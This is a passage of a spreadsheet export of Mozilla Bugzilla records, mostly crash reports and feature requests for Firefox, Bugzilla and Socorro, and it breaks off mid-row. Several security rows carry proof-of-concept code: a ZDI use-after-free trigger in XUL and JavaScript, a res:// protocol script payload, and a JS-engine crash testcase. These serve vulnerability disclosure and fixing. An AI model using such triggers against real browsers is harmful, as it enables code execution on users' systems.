          <t>2011-07-18 18:07:29 -0700</t>
        </is>
      </c>
      <c r="E2676" t="n">
        <v>1</v>
      </c>
      <c r="F2676" t="n">
        <v>1</v>
      </c>
      <c r="G2676" t="n">
        <v>5</v>
      </c>
      <c r="H2676" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2676" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J2676" t="inlineStr">
        <is>
          <t>Users and Groups</t>
        </is>
      </c>
      <c r="K2676" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2676" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2676" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2676" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2676" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2676" t="inlineStr"/>
      <c r="Q2676" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2676" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2676" t="inlineStr">
        <is>
          <t>2011-07-19</t>
        </is>
      </c>
      <c r="T2676" t="n">
        <v>1</v>
      </c>
      <c r="U2676" t="n">
        <v>0</v>
      </c>
      <c r="V2676" t="n">
        <v>3</v>
      </c>
      <c r="W2676" t="inlineStr">
        <is>
          <t>the review dashboard should basically look like a thread list of all the discussion forum threads you've posted in, sorted by recent reply, regardless of which forum.</t>
        </is>
      </c>
      <c r="X2676" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2677">
      <c r="A2677" t="n">
        <v>538065</v>
      </c>
      <c r="B2677" t="inlineStr">
        <is>
          <t>2010-01-05 17:54:49 -0800</t>
        </is>
      </c>
      <c r="C2677" t="inlineStr">
        <is>
          <t>"ASSERTION: invalid array index" with glyphruns at YouTube</t>
        </is>
      </c>
      <c r="D2677" t="inlineStr">
        <is>
          <t>2010-04-11 17:01:46 -0700</t>
        </is>
      </c>
      <c r="E2677" t="n">
        <v>1</v>
      </c>
      <c r="F2677" t="n">
        <v>1</v>
      </c>
      <c r="G2677" t="n">
        <v>3</v>
      </c>
      <c r="H2677" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2677" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2677" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K2677" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2677" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2677" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2677" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2677" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2677" t="inlineStr">
        <is>
          <t>[sg:critical?][3.6.x][rc-ridealong]</t>
        </is>
      </c>
      <c r="Q2677" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2677" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2677" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2677" t="n">
        <v>1</v>
      </c>
      <c r="U2677" t="n">
        <v>0</v>
      </c>
      <c r="V2677" t="n">
        <v>20</v>
      </c>
      <c r="W2677" t="inlineStr">
        <is>
          <t>Created attachment 420240
stack trace
In debug Firefox trunk, loading any YouTube video page triggers:
###!!! ASSERTION: invalid array index: 'i &lt; Length()', file ../../../dist/include/nsTArray.h, line 317
#5  0x041418ae in NS_DebugBreak_P (aSeverity=1, aStr=0x42f9140 "invalid array index", aExpr=0x42e7e60 "i &lt; Length()", aFile=0x42f84dc "../../../dist/include/nsTArray.h", aLine=317) at /Users/jruderman/central/xpcom/base/nsDebugImpl.cpp:360
#6  0x0419b602 in nsTArray&lt;gfxTextRun::GlyphRun&gt;::ElementAt (this=0x213333d4, i=1) at nsTArray.h:317
#7  0x0419b636 in nsTArray&lt;gfxTextRun::GlyphRun&gt;::operator[] (this=0x213333d4, i=1) at nsTArray.h:350
#8  0x04197fb7 in gfxTextRun::SanitizeGlyphRuns (this=0x213333c0) at /Users/jruderman/central/gfx/thebes/src/gfxFont.cpp:2725
...</t>
        </is>
      </c>
      <c r="X2677" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2678">
      <c r="A2678" t="n">
        <v>90959</v>
      </c>
      <c r="B2678" t="inlineStr">
        <is>
          <t>2001-07-16 08:52:37 -0700</t>
        </is>
      </c>
      <c r="C2678" t="inlineStr">
        <is>
          <t>Plugins may not work at all on less than OS 9.1</t>
        </is>
      </c>
      <c r="D2678" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E2678" t="n">
        <v>1</v>
      </c>
      <c r="F2678" t="n">
        <v>1</v>
      </c>
      <c r="G2678" t="n">
        <v>6</v>
      </c>
      <c r="H2678" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2678" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J2678" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K2678" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2678" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M2678" t="inlineStr">
        <is>
          <t>Mac System 8.6</t>
        </is>
      </c>
      <c r="N2678" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2678" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2678" t="inlineStr">
        <is>
          <t>PDT+</t>
        </is>
      </c>
      <c r="Q2678" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2678" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2678" t="inlineStr">
        <is>
          <t>mozilla0.9.3</t>
        </is>
      </c>
      <c r="T2678" t="n">
        <v>1</v>
      </c>
      <c r="U2678" t="n">
        <v>0</v>
      </c>
      <c r="V2678" t="n">
        <v>82</v>
      </c>
      <c r="W2678" t="inlineStr">
        <is>
          <t>Seen on recent builds, trunk and branch.
-goto about:plugins to be certain that the flash player is present.
-goto the listed site to view a flash page. click on flash version
expected results: An animated Flash page should open and be in motion. 
tested results: the window where the Flash animation is supposed to view is 
blank.</t>
        </is>
      </c>
      <c r="X2678" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2679">
      <c r="A2679" t="n">
        <v>31117</v>
      </c>
      <c r="B2679" t="inlineStr">
        <is>
          <t>2000-03-08 19:23:03 -0800</t>
        </is>
      </c>
      <c r="C2679" t="inlineStr">
        <is>
          <t>should have a "submit only my comments" option on midair collision</t>
        </is>
      </c>
      <c r="D2679" t="inlineStr">
        <is>
          <t>2013-05-21 13:04:28 -0700</t>
        </is>
      </c>
      <c r="E2679" t="n">
        <v>1</v>
      </c>
      <c r="F2679" t="n">
        <v>1</v>
      </c>
      <c r="G2679" t="n">
        <v>4</v>
      </c>
      <c r="H2679" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2679" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2679" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K2679" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2679" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2679" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2679" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2679" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2679" t="inlineStr">
        <is>
          <t>midair</t>
        </is>
      </c>
      <c r="Q2679" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2679" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2679" t="inlineStr">
        <is>
          <t>Bugzilla 3.4</t>
        </is>
      </c>
      <c r="T2679" t="n">
        <v>1</v>
      </c>
      <c r="U2679" t="n">
        <v>0</v>
      </c>
      <c r="V2679" t="n">
        <v>32</v>
      </c>
      <c r="W2679" t="inlineStr">
        <is>
          <t>Some suggestions for the midair collision warning:
Since it states right in the "submit anyway" text that added comments will not be 
overridden, the midair collision warning should not happen if the other thing the 
previous person to edit the bug did was add a comment.  Since it displays the 
diff right on the page, it's pretty obvious that was the only thing done, and the 
collision detection should be smart enough to figure that out and not give the 
warning.
Conversly, if the CURRENT edit is only adding a comment, this should also 
automatically happen, and not issue the warning.  (on the other hand, it could be 
a duplicate post from the same browser, which is probably also detectable, and 
the warning should occur in this case).
Also, instead of only "Submit anyway and erase the other persons changes (except 
comments)" and "throw out my changes and revisit the bug", it should also have a 
choice to "add my comment anyway, but ignore any other changes I made".</t>
        </is>
      </c>
      <c r="X2679" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2680">
      <c r="A2680" t="n">
        <v>506871</v>
      </c>
      <c r="B2680" t="inlineStr">
        <is>
          <t>2009-07-28 01:10:28 -0700</t>
        </is>
      </c>
      <c r="C2680" t="inlineStr">
        <is>
          <t>TreeColumns Dangling Pointer Vulnerability (ZDI-CAN-536)</t>
        </is>
      </c>
      <c r="D2680" t="inlineStr">
        <is>
          <t>2018-04-30 13:12:06 -0700</t>
        </is>
      </c>
      <c r="E2680" t="n">
        <v>1</v>
      </c>
      <c r="F2680" t="n">
        <v>1</v>
      </c>
      <c r="G2680" t="n">
        <v>3</v>
      </c>
      <c r="H2680" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2680" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2680" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K2680" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2680" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2680" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2680" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2680" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2680" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q2680" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2680" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2680" t="inlineStr">
        <is>
          <t>mozilla1.9.2b1</t>
        </is>
      </c>
      <c r="T2680" t="n">
        <v>1</v>
      </c>
      <c r="U2680" t="n">
        <v>0</v>
      </c>
      <c r="V2680" t="n">
        <v>23</v>
      </c>
      <c r="W2680" t="inlineStr">
        <is>
          <t>ZDI-CAN-536: Mozilla Firefox TreeColumns Dangling Pointer Vulnerability
-- ABSTRACT ------------------------------------------------------------
TippingPoint has identified a vulnerability affecting the following 
products:
    Mozilla Firefox 3.0.x
-- VULNERABILITY DETAILS -----------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page.
The specific flaw exists during the redrawing of tree columns contained
within a XUL document. Due to the reuse of a previously freed object,
attacker controlled memory can be executed. Successful exploitation of
this vulnerability can lead to remote compromise of the affected system
under the credentials of the currently logged in user.
When accessing the column information and then redrawing the screen, a
pointer is freed by the garbage collector, which is later accessed
allowing user controllable memory to be executed by a dangling pointer.
The following XUL document demonstrates the tree while the Javascript
accompanying it results in an exploitable condition.
&lt;tree id="tr"&gt;
   &lt;treecols&gt;
     &lt;treecol flex="1"/&gt;
   &lt;/treecols&gt;
   &lt;treechildren&gt;
   &lt;/treechildren&gt;
&lt;/tree&gt;
o5 = document.getElementById('tr');
o62 = o5.columns.getFirstColumn();
o5.style.MozBinding = 'url("binding.xml#bind351")';
window.QueryInterface(Components.interfaces.nsIInterfaceRequestor).getInterface(Components.interfaces.nsIDOMWindowUtils).redraw();
o62.columns;
o62.columns;
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * Anonymous</t>
        </is>
      </c>
      <c r="X2680" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2681">
      <c r="A2681" t="n">
        <v>1001994</v>
      </c>
      <c r="B2681" t="inlineStr">
        <is>
          <t>2014-04-27 04:10:17 -0700</t>
        </is>
      </c>
      <c r="C2681" t="inlineStr">
        <is>
          <t>crash in libsystem_kernel.dylib@0x15866 on printing with position: sticky</t>
        </is>
      </c>
      <c r="D2681" t="inlineStr">
        <is>
          <t>2017-10-07 09:26:28 -0700</t>
        </is>
      </c>
      <c r="E2681" t="n">
        <v>1</v>
      </c>
      <c r="F2681" t="n">
        <v>1</v>
      </c>
      <c r="G2681" t="n">
        <v>3</v>
      </c>
      <c r="H2681" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2681" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2681" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K2681" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2681" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2681" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2681" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2681" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2681" t="inlineStr">
        <is>
          <t>[adv-main33+]</t>
        </is>
      </c>
      <c r="Q2681" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2681" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2681" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T2681" t="n">
        <v>1</v>
      </c>
      <c r="U2681" t="n">
        <v>0</v>
      </c>
      <c r="V2681" t="n">
        <v>32</v>
      </c>
      <c r="W2681" t="inlineStr">
        <is>
          <t>Created attachment 8413351
crash1.htm
See testcase, which crashes on printing or print preview.
This bug was filed from the Socorro interface and is 
report bp-44611da7-eede-4bd8-98e8-73db42140427.
=============================================================
0 	libsystem_kernel.dylib 	libsystem_kernel.dylib@0x15866 	
1 	libsystem_pthread.dylib 	libsystem_pthread.dylib@0x235c 	
2 	libc++abi.dylib 	libc++abi.dylib@0x27726 	
3 	libsystem_c.dylib 	libsystem_c.dylib@0x5cb1a 	
4 	libc++abi.dylib 	libc++abi.dylib@0x27726 	
5 	libc++abi.dylib 	libc++abi.dylib@0xf31 	
6 	XUL 	nsStyleContext::~nsStyleContext() 	obj-firefox/x86_64/dist/include/nsCOMPtr.h
7 	libc++abi.dylib 	libc++abi.dylib@0x25447 	
8 	XUL 	nsLayoutUtils::GetNearestScrollableFrame(nsIFrame*, unsigned int) 	layout/generic/nsQueryFrame.h
9 	XUL 	mozilla::StickyScrollContainer::GetStickyScrollContainerForFrame(nsIFrame*) 	layout/generic/StickyScrollContainer.cpp
10 	XUL 	nsFrame::DestroyFrom(nsIFrame*) 	layout/generic/nsFrame.cpp</t>
        </is>
      </c>
      <c r="X2681" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2682">
      <c r="A2682" t="n">
        <v>821850</v>
      </c>
      <c r="B2682" t="inlineStr">
        <is>
          <t>2012-12-14 12:34:42 -0800</t>
        </is>
      </c>
      <c r="C2682" t="inlineStr">
        <is>
          <t>Investigate running XBL in a separate compartment</t>
        </is>
      </c>
      <c r="D2682" t="inlineStr">
        <is>
          <t>2014-11-19 19:39:27 -0800</t>
        </is>
      </c>
      <c r="E2682" t="n">
        <v>1</v>
      </c>
      <c r="F2682" t="n">
        <v>1</v>
      </c>
      <c r="G2682" t="n">
        <v>3</v>
      </c>
      <c r="H2682" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2682" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2682" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2682" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2682" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2682" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2682" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2682" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2682" t="inlineStr">
        <is>
          <t>[adv-main21+]</t>
        </is>
      </c>
      <c r="Q2682" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2682" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2682" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T2682" t="n">
        <v>1</v>
      </c>
      <c r="U2682" t="n">
        <v>0</v>
      </c>
      <c r="V2682" t="n">
        <v>103</v>
      </c>
      <c r="W2682" t="inlineStr">
        <is>
          <t>I'm prototyping some patches for this, leveraging sandboxes to avoid hand-coding a lot of infrastructure. It might not work out. Let's see.</t>
        </is>
      </c>
      <c r="X2682" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2683">
      <c r="A2683" t="n">
        <v>1331972</v>
      </c>
      <c r="B2683" t="inlineStr">
        <is>
          <t>2017-01-18 07:55:31 -0800</t>
        </is>
      </c>
      <c r="C2683" t="inlineStr">
        <is>
          <t>Firefox will crash when trying to add pages to Reading List via 3DT (Peek &amp; Pop)</t>
        </is>
      </c>
      <c r="D2683" t="inlineStr">
        <is>
          <t>2017-06-29 15:15:49 -0700</t>
        </is>
      </c>
      <c r="E2683" t="n">
        <v>1</v>
      </c>
      <c r="F2683" t="n">
        <v>1</v>
      </c>
      <c r="G2683" t="n">
        <v>2</v>
      </c>
      <c r="H2683" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2683" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J2683" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2683" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2683" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2683" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N2683" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2683" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2683" t="inlineStr">
        <is>
          <t>[MobileCore]</t>
        </is>
      </c>
      <c r="Q2683" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2683" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2683" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2683" t="n">
        <v>1</v>
      </c>
      <c r="U2683" t="n">
        <v>0</v>
      </c>
      <c r="V2683" t="n">
        <v>7</v>
      </c>
      <c r="W2683" t="inlineStr">
        <is>
          <t>Created attachment 8827956
Client  18-01-2017, 17-00.crash
Build: 
Device: iPhone 7
iOS: 10.0.1
Steps to reproduce: 
1. Launch Firefox
2. Go to Setting
3. Tap on 'Your Rights'
4. Force Touch (use Peek &amp; Pop feature) on the  'Mozilla Public License' hyperlink
5. Tap on 'Add to Reading List' 
Actual:
- Firefox will crash.
Expected:
- The link is added to the Reading List.
See a video of the issue: 
- https://www.youtube.com/watch?v=ZPQsngi457Q
Note:
- I have reproduced this only on links from the following menu sections: 
  - Your Rights
  - Licences
  - Sign In to Firefox - Forgot Password
                       - Use different account</t>
        </is>
      </c>
      <c r="X2683" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2684">
      <c r="A2684" t="n">
        <v>736012</v>
      </c>
      <c r="B2684" t="inlineStr">
        <is>
          <t>2012-03-15 02:10:31 -0700</t>
        </is>
      </c>
      <c r="C2684" t="inlineStr">
        <is>
          <t>Assertion failure: enumerators == cx-&gt;enumerators, at jsinterp.cpp:453 or Crash [@ js_SuppressDeletedProperty]</t>
        </is>
      </c>
      <c r="D2684" t="inlineStr">
        <is>
          <t>2013-01-14 08:15:31 -0800</t>
        </is>
      </c>
      <c r="E2684" t="n">
        <v>1</v>
      </c>
      <c r="F2684" t="n">
        <v>1</v>
      </c>
      <c r="G2684" t="n">
        <v>3</v>
      </c>
      <c r="H2684" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2684" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2684" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2684" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2684" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2684" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2684" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2684" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2684" t="inlineStr">
        <is>
          <t>[sg:critical][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q2684" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2684" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2684" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T2684" t="n">
        <v>1</v>
      </c>
      <c r="U2684" t="n">
        <v>0</v>
      </c>
      <c r="V2684" t="n">
        <v>14</v>
      </c>
      <c r="W2684" t="inlineStr">
        <is>
          <t>The following test asserts/crashes on mozilla-central revision dfcb11712ec2 (options -m -n):
var lfcode = new Array();
lfcode.push("\
function fatty() {\
    try { fatty(); } catch (e) {\
        for each (foo in [1]) {}\
    }\
}\
fatty();\
");
lfcode.push("gc()");
lfcode.push("");
while (true) {
        var file = lfcode.shift(); if (file == undefined) { break; }
        evaluate(file);
}
Crash trace:
==63414== Invalid read of size 1
==63414==    at 0x4848F0: js_SuppressDeletedProperty(JSContext*, JSObject*, long) (jsiter.cpp:1002)
==63414==    by 0x424B31: js::array_shift(JSContext*, unsigned int, JS::Value*) (jsarray.cpp:2559)
==63414==    by 0x483018: js::InvokeKernel(JSContext*, js::CallArgs, js::MaybeConstruct) (jscntxtinlines.h:314)
==63414==    by 0x47EB8D: js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) (jsinterp.cpp:2710)
==63414==    by 0x483AFD: js::Execute(JSContext*, JSScript*, JSObject&amp;, JS::Value*) (jsinterp.cpp:668)
==63414==    by 0x4187F6: JS_ExecuteScript (jsapi.cpp:5275)
==63414==    by 0x408294: Process(JSContext*, JSObject*, char const*, bool) (js.cpp:478)
==63414==    by 0x40AF03: Shell(JSContext*, js::cli::OptionParser*, char**) (js.cpp:4751)
==63414==    by 0x40B5C5: main (js.cpp:5044)
==63414==  Address 0x30 is not stack'd, malloc'd or (recently) free'd
Possibly related to bug 734987?
I'm marking this S-s because the bug requires "gc()" although the crash looks like a null-pointer crash. Please triage and remove S-s if appropriate :)</t>
        </is>
      </c>
      <c r="X2684" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2685">
      <c r="A2685" t="n">
        <v>1549833</v>
      </c>
      <c r="B2685" t="inlineStr">
        <is>
          <t>2019-05-07 13:40:41 -0700</t>
        </is>
      </c>
      <c r="C2685" t="inlineStr">
        <is>
          <t>Lack of mitigation on external protocol execution (res: protocol)</t>
        </is>
      </c>
      <c r="D2685" t="inlineStr">
        <is>
          <t>2024-05-30 09:59:07 -0700</t>
        </is>
      </c>
      <c r="E2685" t="n">
        <v>1</v>
      </c>
      <c r="F2685" t="n">
        <v>1</v>
      </c>
      <c r="G2685" t="n">
        <v>3</v>
      </c>
      <c r="H2685" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2685" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2685" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K2685" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2685" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2685" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2685" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2685" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2685" t="inlineStr">
        <is>
          <t>[necko-triaged][adv-main67+]</t>
        </is>
      </c>
      <c r="Q2685" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2685" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2685" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T2685" t="n">
        <v>1</v>
      </c>
      <c r="U2685" t="n">
        <v>0</v>
      </c>
      <c r="V2685" t="n">
        <v>30</v>
      </c>
      <c r="W2685" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
Steps to reproduce:
We can run res:// scheme from Firefox, which allows us to run JavaScript at renderer process privilege (Low IL) in Internet Explorer.
POC:
&lt;script&gt;window.open("res://apds.dll/redirect.html?target=javascript:alert(1)", "_self");&lt;/script&gt;
Test on: https://pwning.click/ffres.php
Actual results:
Firefox open res:// URL which runs JavaScript at renderer process privilege (Low IL).
Expected results:
Firefox does not allow res:// URL</t>
        </is>
      </c>
      <c r="X2685" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2686">
      <c r="A2686" t="n">
        <v>1401517</v>
      </c>
      <c r="B2686" t="inlineStr">
        <is>
          <t>2017-09-20 04:59:23 -0700</t>
        </is>
      </c>
      <c r="C2686" t="inlineStr">
        <is>
          <t>Allow Super Search query filtering for product version greater-than or less-than a given version</t>
        </is>
      </c>
      <c r="D2686" t="inlineStr">
        <is>
          <t>2021-04-26 06:04:09 -0700</t>
        </is>
      </c>
      <c r="E2686" t="n">
        <v>1</v>
      </c>
      <c r="F2686" t="n">
        <v>1</v>
      </c>
      <c r="G2686" t="n">
        <v>4</v>
      </c>
      <c r="H2686" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2686" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2686" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2686" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2686" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2686" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2686" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2686" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2686" t="inlineStr"/>
      <c r="Q2686" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2686" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2686" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2686" t="n">
        <v>1</v>
      </c>
      <c r="U2686" t="n">
        <v>0</v>
      </c>
      <c r="V2686" t="n">
        <v>10</v>
      </c>
      <c r="W2686" t="inlineStr">
        <is>
          <t>I'd like to be able to ignore all crash reports from versions of Firefox prior to a given version number. Since you can use version=X in the query string to filter on a specific version I was hopeful that you could also use version&gt;=X to return results for version X and above. Unfortunately that doesn't seem to work.</t>
        </is>
      </c>
      <c r="X2686" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2687">
      <c r="A2687" t="n">
        <v>1866840</v>
      </c>
      <c r="B2687" t="inlineStr">
        <is>
          <t>2023-11-27 09:44:24 -0800</t>
        </is>
      </c>
      <c r="C2687" t="inlineStr">
        <is>
          <t>TImeout code for calling SetupMacCommandLine on main thread can lead to a UAF</t>
        </is>
      </c>
      <c r="D2687" t="inlineStr">
        <is>
          <t>2024-05-14 21:13:44 -0700</t>
        </is>
      </c>
      <c r="E2687" t="n">
        <v>1</v>
      </c>
      <c r="F2687" t="n">
        <v>1</v>
      </c>
      <c r="G2687" t="n">
        <v>3</v>
      </c>
      <c r="H2687" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2687" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J2687" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K2687" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2687" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2687" t="inlineStr">
        <is>
          <t>Unspecified</t>
